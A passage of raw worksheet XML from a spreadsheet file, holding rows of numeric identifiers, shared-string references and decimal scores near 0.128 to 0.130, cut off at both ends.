      </c>
      <c r="D771" s="2">
        <v>1.0</v>
      </c>
      <c r="E771" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F771" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="772" ht="15.75" customHeight="1">
      <c r="A772" s="1">
        <v>24133.0</v>
      </c>
      <c r="B772" s="2">
        <v>1.004768E7</v>
      </c>
      <c r="C772" s="2" t="s">
        <v>678</v>
      </c>
      <c r="D772" s="2">
        <v>1.0</v>
      </c>
      <c r="E772" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F772" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="773" ht="15.75" customHeight="1">
      <c r="A773" s="1">
        <v>25848.0</v>
      </c>
      <c r="B773" s="2">
        <v>1.4830482E7</v>
      </c>
      <c r="C773" s="2" t="s">
        <v>679</v>
      </c>
      <c r="D773" s="2">
        <v>1.0</v>
      </c>
      <c r="E773" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F773" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="774" ht="15.75" customHeight="1">
      <c r="A774" s="1">
        <v>26421.0</v>
      </c>
      <c r="B774" s="2">
        <v>1.7154828E7</v>
      </c>
      <c r="C774" s="2" t="s">
        <v>674</v>
      </c>
      <c r="D774" s="2">
        <v>1.0</v>
      </c>
      <c r="E774" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F774" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="775" ht="15.75" customHeight="1">
      <c r="A775" s="1">
        <v>28332.0</v>
      </c>
      <c r="B775" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C775" s="2" t="s">
        <v>680</v>
      </c>
      <c r="D775" s="2">
        <v>1.0</v>
      </c>
      <c r="E775" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F775" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="776" ht="15.75" customHeight="1">
      <c r="A776" s="1">
        <v>29285.0</v>
      </c>
      <c r="B776" s="2">
        <v>3.1057024E7</v>
      </c>
      <c r="C776" s="2" t="s">
        <v>681</v>
      </c>
      <c r="D776" s="2">
        <v>1.0</v>
      </c>
      <c r="E776" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F776" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="777" ht="15.75" customHeight="1">
      <c r="A777" s="1">
        <v>29581.0</v>
      </c>
      <c r="B777" s="2">
        <v>3.3495929E7</v>
      </c>
      <c r="C777" s="2" t="s">
        <v>682</v>
      </c>
      <c r="D777" s="2">
        <v>1.0</v>
      </c>
      <c r="E777" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F777" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="778" ht="15.75" customHeight="1">
      <c r="A778" s="1">
        <v>29603.0</v>
      </c>
      <c r="B778" s="2">
        <v>3.3567932E7</v>
      </c>
      <c r="C778" s="2" t="s">
        <v>683</v>
      </c>
      <c r="D778" s="2">
        <v>1.0</v>
      </c>
      <c r="E778" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F778" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="779" ht="15.75" customHeight="1">
      <c r="A779" s="1">
        <v>30452.0</v>
      </c>
      <c r="B779" s="2">
        <v>3.9443945E7</v>
      </c>
      <c r="C779" s="2" t="s">
        <v>684</v>
      </c>
      <c r="D779" s="2">
        <v>1.0</v>
      </c>
      <c r="E779" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F779" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="780" ht="15.75" customHeight="1">
      <c r="A780" s="1">
        <v>33398.0</v>
      </c>
      <c r="B780" s="2">
        <v>7703985.0</v>
      </c>
      <c r="C780" s="2" t="s">
        <v>685</v>
      </c>
      <c r="D780" s="2">
        <v>1.0</v>
      </c>
      <c r="E780" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F780" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="781" ht="15.75" customHeight="1">
      <c r="A781" s="1">
        <v>22043.0</v>
      </c>
      <c r="B781" s="2">
        <v>3.0235025E7</v>
      </c>
      <c r="C781" s="2" t="s">
        <v>686</v>
      </c>
      <c r="D781" s="2">
        <v>1.0</v>
      </c>
      <c r="E781" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F781" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="782" ht="15.75" customHeight="1">
      <c r="A782" s="1">
        <v>29595.0</v>
      </c>
      <c r="B782" s="2">
        <v>3.3537841E7</v>
      </c>
      <c r="C782" s="2" t="s">
        <v>687</v>
      </c>
      <c r="D782" s="2">
        <v>1.0</v>
      </c>
      <c r="E782" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F782" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="783" ht="15.75" customHeight="1">
      <c r="A783" s="1">
        <v>30613.0</v>
      </c>
      <c r="B783" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C783" s="2" t="s">
        <v>688</v>
      </c>
      <c r="D783" s="2">
        <v>1.0</v>
      </c>
      <c r="E783" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F783" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="784" ht="15.75" customHeight="1">
      <c r="A784" s="1">
        <v>14607.0</v>
      </c>
      <c r="B784" s="2">
        <v>4.0251502E7</v>
      </c>
      <c r="C784" s="2" t="s">
        <v>689</v>
      </c>
      <c r="D784" s="2">
        <v>1.0</v>
      </c>
      <c r="E784" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F784" s="2">
        <v>0.1290598290598291</v>
      </c>
    </row>
    <row r="785" ht="15.75" customHeight="1">
      <c r="A785" s="1">
        <v>18709.0</v>
      </c>
      <c r="B785" s="2">
        <v>5.3644138E7</v>
      </c>
      <c r="C785" s="2" t="s">
        <v>690</v>
      </c>
      <c r="D785" s="2">
        <v>1.0</v>
      </c>
      <c r="E785" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F785" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="786" ht="15.75" customHeight="1">
      <c r="A786" s="1">
        <v>22415.0</v>
      </c>
      <c r="B786" s="2">
        <v>3.6031569E7</v>
      </c>
      <c r="C786" s="2" t="s">
        <v>691</v>
      </c>
      <c r="D786" s="2">
        <v>1.0</v>
      </c>
      <c r="E786" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F786" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="787" ht="15.75" customHeight="1">
      <c r="A787" s="1">
        <v>21620.0</v>
      </c>
      <c r="B787" s="2">
        <v>2.4574241E7</v>
      </c>
      <c r="C787" s="2" t="s">
        <v>692</v>
      </c>
      <c r="D787" s="2">
        <v>1.0</v>
      </c>
      <c r="E787" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F787" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="788" ht="15.75" customHeight="1">
      <c r="A788" s="1">
        <v>31421.0</v>
      </c>
      <c r="B788" s="2">
        <v>5.0118861E7</v>
      </c>
      <c r="C788" s="2" t="s">
        <v>693</v>
      </c>
      <c r="D788" s="2">
        <v>1.0</v>
      </c>
      <c r="E788" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F788" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="789" ht="15.75" customHeight="1">
      <c r="A789" s="1">
        <v>33576.0</v>
      </c>
      <c r="B789" s="2">
        <v>8276419.0</v>
      </c>
      <c r="C789" s="2" t="s">
        <v>694</v>
      </c>
      <c r="D789" s="2">
        <v>1.0</v>
      </c>
      <c r="E789" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F789" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="790" ht="15.75" customHeight="1">
      <c r="A790" s="1">
        <v>17796.0</v>
      </c>
      <c r="B790" s="2">
        <v>5.0803686E7</v>
      </c>
      <c r="C790" s="2" t="s">
        <v>695</v>
      </c>
      <c r="D790" s="2">
        <v>1.0</v>
      </c>
      <c r="E790" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F790" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="791" ht="15.75" customHeight="1">
      <c r="A791" s="1">
        <v>7023.0</v>
      </c>
      <c r="B791" s="2">
        <v>5.0109379E7</v>
      </c>
      <c r="C791" s="2" t="s">
        <v>696</v>
      </c>
      <c r="D791" s="2">
        <v>1.0</v>
      </c>
      <c r="E791" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F791" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="792" ht="15.75" customHeight="1">
      <c r="A792" s="1">
        <v>12013.0</v>
      </c>
      <c r="B792" s="2">
        <v>2.6040948E7</v>
      </c>
      <c r="C792" s="2" t="s">
        <v>697</v>
      </c>
      <c r="D792" s="2">
        <v>1.0</v>
      </c>
      <c r="E792" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F792" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="793" ht="15.75" customHeight="1">
      <c r="A793" s="1">
        <v>13266.0</v>
      </c>
      <c r="B793" s="2">
        <v>3.4362462E7</v>
      </c>
      <c r="C793" s="2" t="s">
        <v>698</v>
      </c>
      <c r="D793" s="2">
        <v>1.0</v>
      </c>
      <c r="E793" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F793" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="794" ht="15.75" customHeight="1">
      <c r="A794" s="1">
        <v>15192.0</v>
      </c>
      <c r="B794" s="2">
        <v>4.2053639E7</v>
      </c>
      <c r="C794" s="2" t="s">
        <v>699</v>
      </c>
      <c r="D794" s="2">
        <v>1.0</v>
      </c>
      <c r="E794" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F794" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="795" ht="15.75" customHeight="1">
      <c r="A795" s="1">
        <v>23786.0</v>
      </c>
      <c r="B795" s="2">
        <v>7690285.0</v>
      </c>
      <c r="C795" s="2" t="s">
        <v>700</v>
      </c>
      <c r="D795" s="2">
        <v>1.0</v>
      </c>
      <c r="E795" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F795" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="796" ht="15.75" customHeight="1">
      <c r="A796" s="1">
        <v>24408.0</v>
      </c>
      <c r="B796" s="2">
        <v>1.082269E7</v>
      </c>
      <c r="C796" s="2" t="s">
        <v>701</v>
      </c>
      <c r="D796" s="2">
        <v>1.0</v>
      </c>
      <c r="E796" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F796" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="797" ht="15.75" customHeight="1">
      <c r="A797" s="1">
        <v>30751.0</v>
      </c>
      <c r="B797" s="2">
        <v>4.4173153E7</v>
      </c>
      <c r="C797" s="2" t="s">
        <v>702</v>
      </c>
      <c r="D797" s="2">
        <v>1.0</v>
      </c>
      <c r="E797" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F797" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="798" ht="15.75" customHeight="1">
      <c r="A798" s="1">
        <v>26873.0</v>
      </c>
      <c r="B798" s="2">
        <v>1.9102796E7</v>
      </c>
      <c r="C798" s="2" t="s">
        <v>703</v>
      </c>
      <c r="D798" s="2">
        <v>1.0</v>
      </c>
      <c r="E798" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F798" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="799" ht="15.75" customHeight="1">
      <c r="A799" s="1">
        <v>28444.0</v>
      </c>
      <c r="B799" s="2">
        <v>2.6516652E7</v>
      </c>
      <c r="C799" s="2" t="s">
        <v>704</v>
      </c>
      <c r="D799" s="2">
        <v>1.0</v>
      </c>
      <c r="E799" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F799" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="800" ht="15.75" customHeight="1">
      <c r="A800" s="1">
        <v>29414.0</v>
      </c>
      <c r="B800" s="2">
        <v>3.2103609E7</v>
      </c>
      <c r="C800" s="2" t="s">
        <v>705</v>
      </c>
      <c r="D800" s="2">
        <v>1.0</v>
      </c>
      <c r="E800" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F800" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="801" ht="15.75" customHeight="1">
      <c r="A801" s="1">
        <v>30130.0</v>
      </c>
      <c r="B801" s="2">
        <v>3.6994849E7</v>
      </c>
      <c r="C801" s="2" t="s">
        <v>705</v>
      </c>
      <c r="D801" s="2">
        <v>1.0</v>
      </c>
      <c r="E801" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F801" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="802" ht="15.75" customHeight="1">
      <c r="A802" s="1">
        <v>33220.0</v>
      </c>
      <c r="B802" s="2">
        <v>7247548.0</v>
      </c>
      <c r="C802" s="2" t="s">
        <v>706</v>
      </c>
      <c r="D802" s="2">
        <v>1.0</v>
      </c>
      <c r="E802" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F802" s="2">
        <v>0.1280193236714976</v>
      </c>
    </row>
    <row r="803" ht="15.75" customHeight="1">
      <c r="A803" s="1">
        <v>1544.0</v>
      </c>
      <c r="B803" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C803" s="2" t="s">
        <v>707</v>
      </c>
      <c r="D803" s="2">
        <v>1.0</v>
      </c>
      <c r="E803" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F803" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="804" ht="15.75" customHeight="1">
      <c r="A804" s="1">
        <v>6326.0</v>
      </c>
      <c r="B804" s="2">
        <v>4.8284436E7</v>
      </c>
      <c r="C804" s="2" t="s">
        <v>708</v>
      </c>
      <c r="D804" s="2">
        <v>1.0</v>
      </c>
      <c r="E804" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F804" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="805" ht="15.75" customHeight="1">
      <c r="A805" s="1">
        <v>7684.0</v>
      </c>
      <c r="B805" s="2">
        <v>5.1939528E7</v>
      </c>
      <c r="C805" s="2" t="s">
        <v>709</v>
      </c>
      <c r="D805" s="2">
        <v>1.0</v>
      </c>
      <c r="E805" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F805" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="806" ht="15.75" customHeight="1">
      <c r="A806" s="1">
        <v>10934.0</v>
      </c>
      <c r="B806" s="2">
        <v>1.6953708E7</v>
      </c>
      <c r="C806" s="2" t="s">
        <v>710</v>
      </c>
      <c r="D806" s="2">
        <v>1.0</v>
      </c>
      <c r="E806" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F806" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="807" ht="15.75" customHeight="1">
      <c r="A807" s="1">
        <v>13633.0</v>
      </c>
      <c r="B807" s="2">
        <v>3.5904506E7</v>
      </c>
      <c r="C807" s="2" t="s">
        <v>711</v>
      </c>
      <c r="D807" s="2">
        <v>1.0</v>
      </c>
      <c r="E807" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F807" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="808" ht="15.75" customHeight="1">
      <c r="A808" s="1">
        <v>14497.0</v>
      </c>
      <c r="B808" s="2">
        <v>3.9653626E7</v>
      </c>
      <c r="C808" s="2" t="s">
        <v>712</v>
      </c>
      <c r="D808" s="2">
        <v>1.0</v>
      </c>
      <c r="E808" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F808" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="809" ht="15.75" customHeight="1">
      <c r="A809" s="1">
        <v>15745.0</v>
      </c>
      <c r="B809" s="2">
        <v>4.4118243E7</v>
      </c>
      <c r="C809" s="2" t="s">
        <v>713</v>
      </c>
      <c r="D809" s="2">
        <v>1.0</v>
      </c>
      <c r="E809" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F809" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="810" ht="15.75" customHeight="1">
      <c r="A810" s="1">
        <v>17232.0</v>
      </c>
      <c r="B810" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C810" s="2" t="s">
        <v>714</v>
      </c>
      <c r="D810" s="2">
        <v>1.0</v>
      </c>
      <c r="E810" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F810" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="811" ht="15.75" customHeight="1">
      <c r="A811" s="1">
        <v>20131.0</v>
      </c>
      <c r="B811" s="2">
        <v>1.0074977E7</v>
      </c>
      <c r="C811" s="2" t="s">
        <v>715</v>
      </c>
      <c r="D811" s="2">
        <v>1.0</v>
      </c>
      <c r="E811" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F811" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="812" ht="15.75" customHeight="1">
      <c r="A812" s="1">
        <v>20408.0</v>
      </c>
      <c r="B812" s="2">
        <v>1.220956E7</v>
      </c>
      <c r="C812" s="2" t="s">
        <v>716</v>
      </c>
      <c r="D812" s="2">
        <v>1.0</v>
      </c>
      <c r="E812" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F812" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="813" ht="15.75" customHeight="1">
      <c r="A813" s="1">
        <v>20476.0</v>
      </c>
      <c r="B813" s="2">
        <v>1.2824566E7</v>
      </c>
      <c r="C813" s="2" t="s">
        <v>717</v>
      </c>
      <c r="D813" s="2">
        <v>1.0</v>
      </c>
      <c r="E813" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F813" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="814" ht="15.75" customHeight="1">
      <c r="A814" s="1">
        <v>21291.0</v>
      </c>
      <c r="B814" s="2">
        <v>2.0505257E7</v>
      </c>
      <c r="C814" s="2" t="s">
        <v>718</v>
      </c>
      <c r="D814" s="2">
        <v>1.0</v>
      </c>
      <c r="E814" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F814" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="815" ht="15.75" customHeight="1">
      <c r="A815" s="1">
        <v>21317.0</v>
      </c>
      <c r="B815" s="2">
        <v>2.0873123E7</v>
      </c>
      <c r="C815" s="2" t="s">
        <v>719</v>
      </c>
      <c r="D815" s="2">
        <v>1.0</v>
      </c>
      <c r="E815" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F815" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="816" ht="15.75" customHeight="1">
      <c r="A816" s="1">
        <v>21330.0</v>
      </c>
      <c r="B816" s="2">
        <v>2.1049859E7</v>
      </c>
      <c r="C816" s="2" t="s">
        <v>720</v>
      </c>
      <c r="D816" s="2">
        <v>1.0</v>
      </c>
      <c r="E816" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F816" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="817" ht="15.75" customHeight="1">
      <c r="A817" s="1">
        <v>21969.0</v>
      </c>
      <c r="B817" s="2">
        <v>2.9127671E7</v>
      </c>
      <c r="C817" s="2" t="s">
        <v>721</v>
      </c>
      <c r="D817" s="2">
        <v>1.0</v>
      </c>
      <c r="E817" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F817" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="818" ht="15.75" customHeight="1">
      <c r="A818" s="1">
        <v>22162.0</v>
      </c>
      <c r="B818" s="2">
        <v>3.1457445E7</v>
      </c>
      <c r="C818" s="2" t="s">
        <v>722</v>
      </c>
      <c r="D818" s="2">
        <v>1.0</v>
      </c>
      <c r="E818" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F818" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="819" ht="15.75" customHeight="1">
      <c r="A819" s="1">
        <v>22235.0</v>
      </c>
      <c r="B819" s="2">
        <v>3.2504972E7</v>
      </c>
      <c r="C819" s="2" t="s">
        <v>723</v>
      </c>
      <c r="D819" s="2">
        <v>1.0</v>
      </c>
      <c r="E819" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F819" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="820" ht="15.75" customHeight="1">
      <c r="A820" s="1">
        <v>22768.0</v>
      </c>
      <c r="B820" s="2">
        <v>4.4840715E7</v>
      </c>
      <c r="C820" s="2" t="s">
        <v>724</v>
      </c>
      <c r="D820" s="2">
        <v>1.0</v>
      </c>
      <c r="E820" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F820" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="821" ht="15.75" customHeight="1">
      <c r="A821" s="1">
        <v>22879.0</v>
      </c>
      <c r="B821" s="2">
        <v>4.7609722E7</v>
      </c>
      <c r="C821" s="2" t="s">
        <v>725</v>
      </c>
      <c r="D821" s="2">
        <v>1.0</v>
      </c>
      <c r="E821" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F821" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="822" ht="15.75" customHeight="1">
      <c r="A822" s="1">
        <v>23411.0</v>
      </c>
      <c r="B822" s="2">
        <v>5598918.0</v>
      </c>
      <c r="C822" s="2" t="s">
        <v>726</v>
      </c>
      <c r="D822" s="2">
        <v>1.0</v>
      </c>
      <c r="E822" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F822" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="823" ht="15.75" customHeight="1">
      <c r="A823" s="1">
        <v>23558.0</v>
      </c>
      <c r="B823" s="2">
        <v>6143727.0</v>
      </c>
      <c r="C823" s="2" t="s">
        <v>727</v>
      </c>
      <c r="D823" s="2">
        <v>1.0</v>
      </c>
      <c r="E823" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F823" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="824" ht="15.75" customHeight="1">
      <c r="A824" s="1">
        <v>23827.0</v>
      </c>
      <c r="B824" s="2">
        <v>8003186.0</v>
      </c>
      <c r="C824" s="2" t="s">
        <v>728</v>
      </c>
      <c r="D824" s="2">
        <v>1.0</v>
      </c>
      <c r="E824" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F824" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="825" ht="15.75" customHeight="1">
      <c r="A825" s="1">
        <v>23954.0</v>
      </c>
      <c r="B825" s="2">
        <v>8911733.0</v>
      </c>
      <c r="C825" s="2" t="s">
        <v>729</v>
      </c>
      <c r="D825" s="2">
        <v>1.0</v>
      </c>
      <c r="E825" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F825" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="826" ht="15.75" customHeight="1">
      <c r="A826" s="1">
        <v>24149.0</v>
      </c>
      <c r="B826" s="2">
        <v>1.0074976E7</v>
      </c>
      <c r="C826" s="2" t="s">
        <v>715</v>
      </c>
      <c r="D826" s="2">
        <v>1.0</v>
      </c>
      <c r="E826" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F826" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="827" ht="15.75" customHeight="1">
      <c r="A827" s="1">
        <v>24423.0</v>
      </c>
      <c r="B827" s="2">
        <v>1.0851147E7</v>
      </c>
      <c r="C827" s="2" t="s">
        <v>730</v>
      </c>
      <c r="D827" s="2">
        <v>1.0</v>
      </c>
      <c r="E827" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F827" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="828" ht="15.75" customHeight="1">
      <c r="A828" s="1">
        <v>24911.0</v>
      </c>
      <c r="B828" s="2">
        <v>1.2322121E7</v>
      </c>
      <c r="C828" s="2" t="s">
        <v>731</v>
      </c>
      <c r="D828" s="2">
        <v>1.0</v>
      </c>
      <c r="E828" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F828" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="829" ht="15.75" customHeight="1">
      <c r="A829" s="1">
        <v>25115.0</v>
      </c>
      <c r="B829" s="2">
        <v>1.2970221E7</v>
      </c>
      <c r="C829" s="2" t="s">
        <v>732</v>
      </c>
      <c r="D829" s="2">
        <v>1.0</v>
      </c>
      <c r="E829" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F829" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="830" ht="15.75" customHeight="1">
      <c r="A830" s="1">
        <v>25140.0</v>
      </c>
      <c r="B830" s="2">
        <v>1.3029614E7</v>
      </c>
      <c r="C830" s="2" t="s">
        <v>733</v>
      </c>
      <c r="D830" s="2">
        <v>1.0</v>
      </c>
      <c r="E830" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F830" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="831" ht="15.75" customHeight="1">
      <c r="A831" s="1">
        <v>25272.0</v>
      </c>
      <c r="B831" s="2">
        <v>1.3394859E7</v>
      </c>
      <c r="C831" s="2" t="s">
        <v>734</v>
      </c>
      <c r="D831" s="2">
        <v>1.0</v>
      </c>
      <c r="E831" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F831" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="832" ht="15.75" customHeight="1">
      <c r="A832" s="1">
        <v>25839.0</v>
      </c>
      <c r="B832" s="2">
        <v>1.4792727E7</v>
      </c>
      <c r="C832" s="2" t="s">
        <v>735</v>
      </c>
      <c r="D832" s="2">
        <v>1.0</v>
      </c>
      <c r="E832" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F832" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="833" ht="15.75" customHeight="1">
      <c r="A833" s="1">
        <v>26431.0</v>
      </c>
      <c r="B833" s="2">
        <v>1.7164377E7</v>
      </c>
      <c r="C833" s="2" t="s">
        <v>736</v>
      </c>
      <c r="D833" s="2">
        <v>1.0</v>
      </c>
      <c r="E833" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F833" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="834" ht="15.75" customHeight="1">
      <c r="A834" s="1">
        <v>26723.0</v>
      </c>
      <c r="B834" s="2">
        <v>1.824821E7</v>
      </c>
      <c r="C834" s="2" t="s">
        <v>737</v>
      </c>
      <c r="D834" s="2">
        <v>1.0</v>
      </c>
      <c r="E834" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F834" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="835" ht="15.75" customHeight="1">
      <c r="A835" s="1">
        <v>26764.0</v>
      </c>
      <c r="B835" s="2">
        <v>1.846027E7</v>
      </c>
      <c r="C835" s="2" t="s">
        <v>738</v>
      </c>
      <c r="D835" s="2">
        <v>1.0</v>
      </c>
      <c r="E835" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F835" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="836" ht="15.75" customHeight="1">
      <c r="A836" s="1">
        <v>27044.0</v>
      </c>
      <c r="B836" s="2">
        <v>2.0233405E7</v>
      </c>
      <c r="C836" s="2" t="s">
        <v>739</v>
      </c>
      <c r="D836" s="2">
        <v>1.0</v>
      </c>
      <c r="E836" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F836" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="837" ht="15.75" customHeight="1">
      <c r="A837" s="1">
        <v>27362.0</v>
      </c>
      <c r="B837" s="2">
        <v>2.1660416E7</v>
      </c>
      <c r="C837" s="2" t="s">
        <v>740</v>
      </c>
      <c r="D837" s="2">
        <v>1.0</v>
      </c>
      <c r="E837" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F837" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="838" ht="15.75" customHeight="1">
      <c r="A838" s="1">
        <v>27534.0</v>
      </c>
      <c r="B838" s="2">
        <v>2.2205422E7</v>
      </c>
      <c r="C838" s="2" t="s">
        <v>741</v>
      </c>
      <c r="D838" s="2">
        <v>1.0</v>
      </c>
      <c r="E838" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F838" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="839" ht="15.75" customHeight="1">
      <c r="A839" s="1">
        <v>29588.0</v>
      </c>
      <c r="B839" s="2">
        <v>3.3516662E7</v>
      </c>
      <c r="C839" s="2" t="s">
        <v>742</v>
      </c>
      <c r="D839" s="2">
        <v>1.0</v>
      </c>
      <c r="E839" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F839" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="840" ht="15.75" customHeight="1">
      <c r="A840" s="1">
        <v>29659.0</v>
      </c>
      <c r="B840" s="2">
        <v>3.3908488E7</v>
      </c>
      <c r="C840" s="2" t="s">
        <v>743</v>
      </c>
      <c r="D840" s="2">
        <v>1.0</v>
      </c>
      <c r="E840" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F840" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="841" ht="15.75" customHeight="1">
      <c r="A841" s="1">
        <v>29788.0</v>
      </c>
      <c r="B841" s="2">
        <v>3.5022539E7</v>
